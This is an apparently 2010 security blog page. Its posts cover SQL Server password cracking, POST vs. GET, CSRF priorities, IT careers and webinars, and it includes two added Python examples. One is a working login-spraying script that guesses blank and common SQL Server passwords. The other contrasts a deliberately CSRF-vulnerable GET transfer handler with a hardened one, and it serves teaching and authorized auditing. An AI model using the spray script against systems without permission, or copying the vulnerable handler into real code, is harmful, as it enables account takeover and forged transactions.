You can't secure what you don't acknowledge.SM

Saturday, April 17, 2010

Essentials for cracking SQL Server passwords

Looking to check the resiliency of your Microsoft SQL Server systems? You may very well find that you don't have to look much further than weak/blank passwords to gain full access. I've come across a few vulnerable SQL Server systems via manual analysis. However, I couldn't live without a small set of SQL Server password cracking tools that you should check out as well.

Here's a piece I wrote that can help you get started:

Password cracking tools for SQL Server
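The quickest manual check the post alludes to is simply trying a blank password and a handful of defaults against the well-known logins. The script below is an added example, not code from the linked piece or from any of the tools it mentions. It builds an ordered guess list per login (blank first, then the username itself, then a short constructed list of common passwords) and stops at the first hit for each user. The network side assumes the pymssql driver is installed and is only imported when actually used, so the guessing logic runs on its own; the `max_attempts_per_user` cap is there for logins created with CHECK_POLICY, where a few bad guesses will lock the account.

```python
"""Check SQL Server logins for blank and weak passwords (added example)."""
from typing import Callable, Dict, Iterable, List, Optional, Tuple

# Constructed candidate list: the passwords most often found on SQL Server logins.
COMMON_PASSWORDS = ["", "sa", "password", "Password1", "sql", "admin", "123456"]


def candidates_for(user: str, extra: Iterable[str] = ()) -> List[str]:
    """Build an ordered, de-duplicated guess list for one login.

    Blank first, then the username in the cases people actually use, then the
    common list. Order matters: the cheapest, most likely guesses go first so a
    weak login is found in one or two attempts.
    """
    ordered = ["", user, user.lower(), user.upper()] + list(COMMON_PASSWORDS) + list(extra)
    seen = set()
    out = []
    for guess in ordered:
        if guess not in seen:
            seen.add(guess)
            out.append(guess)
    return out


def pymssql_login(server: str) -> Callable[[str, str], bool]:
    """Return a try-login function backed by pymssql (assumed to be installed).

    The driver is imported lazily so the rest of the module works without it.
    """
    def attempt(user: str, password: str) -> bool:
        import pymssql  # assumption: pymssql is available on this host
        try:
            conn = pymssql.connect(server=server, user=user, password=password, login_timeout=5)
        except pymssql.Error:
            return False
        conn.close()
        return True
    return attempt


def spray(users: Iterable[str], try_login: Callable[[str, str], bool],
          extra: Iterable[str] = (),
          max_attempts_per_user: Optional[int] = None) -> Tuple[Dict[str, Optional[str]], int]:
    """Try the candidate list for each login and stop at the first success per user.

    Returns ({user: password_or_None}, total_attempts). The attempt count shows
    how few guesses a weak login survives; max_attempts_per_user keeps the run
    under an account-lockout threshold for logins that have CHECK_POLICY on.
    """
    results: Dict[str, Optional[str]] = {}
    attempts = 0
    for user in users:
        results[user] = None
        for guess in candidates_for(user, extra)[:max_attempts_per_user]:
            attempts += 1
            if try_login(user, guess):
                results[user] = guess
                break
    return results, attempts


if __name__ == "__main__":
    # Hypothetical target host and logins; adjust before running for real.
    found, count = spray(["sa", "appuser"], pymssql_login("sqlserver.example.internal"))
    for login, pw in found.items():
        print(f"{login}: {'no hit' if pw is None else 'password ' + repr(pw)}")
    print(f"{count} login attempts")
```

Every attempt, successful or not, shows up in the SQL Server error log when failed-login auditing is on, so run this only with authorization and expect it to be noticed.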

Thursday, April 15, 2010

Using POST vs. GET

Here's a piece I wrote recently for

Why use POST vs. GET to keep applications secure

Sure, it's not cut and dried, but use the wrong one when you could've used the other and the resulting vulnerabilities can get ugly.
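To make the "wrong one" concrete, here is an added example (not code from the linked piece) in the form of a tiny WSGI app with two handlers for the same money-transfer action. The first accepts any method and reads the recipient and amount from the query string, so a plain link, an `<img>` on someone else's site or a bookmark performs the transfer, and the parameters end up in browser history, proxy and server logs, and the Referer header. The second accepts only POST, reads the parameters from the body, and checks a per-session CSRF token with a constant-time compare, which is also the usual fix for the CSRF issue discussed further down this page. Account names, session IDs and balances are constructed for the example.

```python
"""POST vs. GET for a state-changing action: a vulnerable WSGI handler next to a hardened one."""
import hmac
import io
import secrets
from urllib.parse import parse_qs

# Constructed state for the example: two accounts and one already-authenticated session.
BALANCES = {"alice": 100, "bob": 0}
SESSIONS = {"sid-alice": {"user": "alice", "csrf": secrets.token_hex(16)}}


def _session(environ):
    """Look up the session named by the 'sid' cookie, or None."""
    for part in environ.get("HTTP_COOKIE", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == "sid":
            return SESSIONS.get(value)
    return None


def _transfer(sender, params):
    """Apply a transfer described by form/query params; False on any bad input."""
    to = params.get("to", [""])[0]
    try:
        amount = int(params.get("amount", ["0"])[0])
    except ValueError:
        return False
    if to not in BALANCES or to == sender or amount <= 0 or BALANCES[sender] < amount:
        return False
    BALANCES[sender] -= amount
    BALANCES[to] += amount
    return True


def _reply(start_response, status, text, extra_headers=()):
    start_response(status, [("Content-Type", "text/plain")] + list(extra_headers))
    return [text.encode()]


def insecure_app(environ, start_response):
    """Vulnerable: any method is accepted and the parameters come from the URL.

    GET /transfer?to=bob&amount=10 with a valid session cookie moves the money,
    whether the user clicked it or a third-party page embedded it as an image.
    """
    sess = _session(environ)
    if environ.get("PATH_INFO") != "/transfer" or sess is None:
        return _reply(start_response, "404 Not Found", "")
    params = parse_qs(environ.get("QUERY_STRING", ""))
    ok = _transfer(sess["user"], params)
    return _reply(start_response, "200 OK", "ok" if ok else "failed")


def secure_app(environ, start_response):
    """Hardened: POST only, parameters from the body, CSRF token tied to the session."""
    sess = _session(environ)
    if environ.get("PATH_INFO") != "/transfer" or sess is None:
        return _reply(start_response, "404 Not Found", "")
    if environ.get("REQUEST_METHOD") != "POST":
        return _reply(start_response, "405 Method Not Allowed", "use POST", [("Allow", "POST")])
    length = int(environ.get("CONTENT_LENGTH") or 0)
    params = parse_qs(environ["wsgi.input"].read(length).decode("utf-8", "replace"))
    token = params.get("csrf", [""])[0]
    # Constant-time comparison so the token cannot be recovered byte by byte.
    if not hmac.compare_digest(token.encode(), sess["csrf"].encode()):
        return _reply(start_response, "403 Forbidden", "missing or bad CSRF token")
    ok = _transfer(sess["user"], params)
    return _reply(start_response, "200 OK", "ok" if ok else "failed")


def call(app, method, path, query="", body="", cookie=""):
    """Drive a WSGI app with a constructed request; returns (status, body_text)."""
    raw = body.encode()
    environ = {
        "REQUEST_METHOD": method, "PATH_INFO": path, "QUERY_STRING": query,
        "HTTP_COOKIE": cookie, "CONTENT_LENGTH": str(len(raw)),
        "CONTENT_TYPE": "application/x-www-form-urlencoded",
        "wsgi.input": io.BytesIO(raw),
    }
    captured = {}

    def start_response(status, headers):
        captured["status"] = status

    out = b"".join(app(environ, start_response))
    return captured["status"], out.decode()


if __name__ == "__main__":
    cookie = "sid=sid-alice"
    print(call(insecure_app, "GET", "/transfer", query="to=bob&amount=10", cookie=cookie))
    print(call(secure_app, "GET", "/transfer", query="to=bob&amount=10", cookie=cookie))
    token = SESSIONS["sid-alice"]["csrf"]
    print(call(secure_app, "POST", "/transfer", body=f"to=bob&amount=10&csrf={token}", cookie=cookie))
    print(BALANCES)
```

Switching to POST alone does not stop a cross-site form post; it only stops the image-tag and link variants and keeps the data out of URLs and logs. The session-bound token is what makes the second handler resist CSRF, and it only holds up if the token is never placed in a URL itself.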

Job hunting? How you can stand out & kick your competitors' butts

Looking for a job in IT or infosec? Here's what you need to do:

Getting hired in IT: How to stand out

CSRF doesn't matter?? The sky is falling!

Here's a great piece where something I wrote got the boxers of a grown man with a hacker handle in a bunch. With all due respect to what Robert has contributed to our field, he is missing the point of my 8-sentence statement about cross-site request forgery (CSRF) not being a top priority. It reminds me of when I wrote about Changes coming to the OWASP Top 10 in 2010. [Boy, some of the "leet" in our field get cranky in a hurry when you say anything that's contrary to their experience!]

What I said was based on what I'm seeing in my work: I don't think CSRF is as big of a deal - or perhaps I should say as top of a priority - as some of the vendors and Top 10 lists characterize it.

Sure, CSRF is still an issue...but what's the context? What's the perspective? What systems or sensitive information are being placed at risk? How does it affect the business? Based on what I see, it's just not there, and when it is, it's usually not as big of a deal as many of the other Web security gaffes we really should be focusing our efforts on.

Robert's blind railing against what I said overlooks the consistent rants I have about NOT relying on tools to find security flaws, like what I wrote about here and here and here and here and here. But who am I to question things...

It's so funny how some people worry about picking nits when there's an elephant in the room. It's all about priorities, folks - we have to prioritize things and focus on the urgent and the important. If you find CSRF that's creating an urgent situation, then you'd better address it quickly! Likewise with XSS, SQL injection, weak passwords, authentication mechanism flaws, and so on. But you've got to focus on what matters to your business in the context of your business - not just what some vendor, Top 10 list, or blogger says is important. Every situation - every application - is different.

There's something about our field - I've met many people over the years who like to find any flaw they can that's even remotely exploitable - regardless of whether or not it really matters in the grand scheme of things - and make a big deal out of it to justify their expertise and their existence. Given all the issues we face in information security today, that approach just doesn't add up.

Wednesday, April 14, 2010

A simple yet highly-effective career booster

One of the best things you can ever do for your career in IT or information security is to network, network, network. It's all about who knows you. Here's what it takes:

Networking to enhance your IT career

Tuesday, April 13, 2010

My (other) webinar this week: Strategies for Securing your Enterprise for Success

If you're around at 2pm ET this Thursday (tax day, woohoo!) please join me for another free webinar: Strategies for Securing your Enterprise for Success

As with all my webinars/webcasts I'll keep it short and sweet - I'll talk for ~20 minutes and we'll have a Q&A at the end.

You can register here:

"See" you there!

My webinar this week: Data Protection: The Realities of Proactive vs. Reactive

Join me tomorrow around lunchtime (or breakfast depending on where you're at) for a webinar on Data Protection: The Realities of Proactive vs. Reactive

I'm going to talk for ~20 minutes and we'll have a Q&A at the end.

It's at 12pm ET and you can register here:

Hope to "see" you there!

Monday, April 12, 2010

View every day as a blessing

Between losing both grandmothers, helping my mom through a serious struggle she's having with cancer over the past 4 weeks, and this news about Brian Tracy, who has been a wonderful inspiration and mentor to me, I'm compelled to say: View every day as a blessing, for we truly don't know how much time we have here on Earth.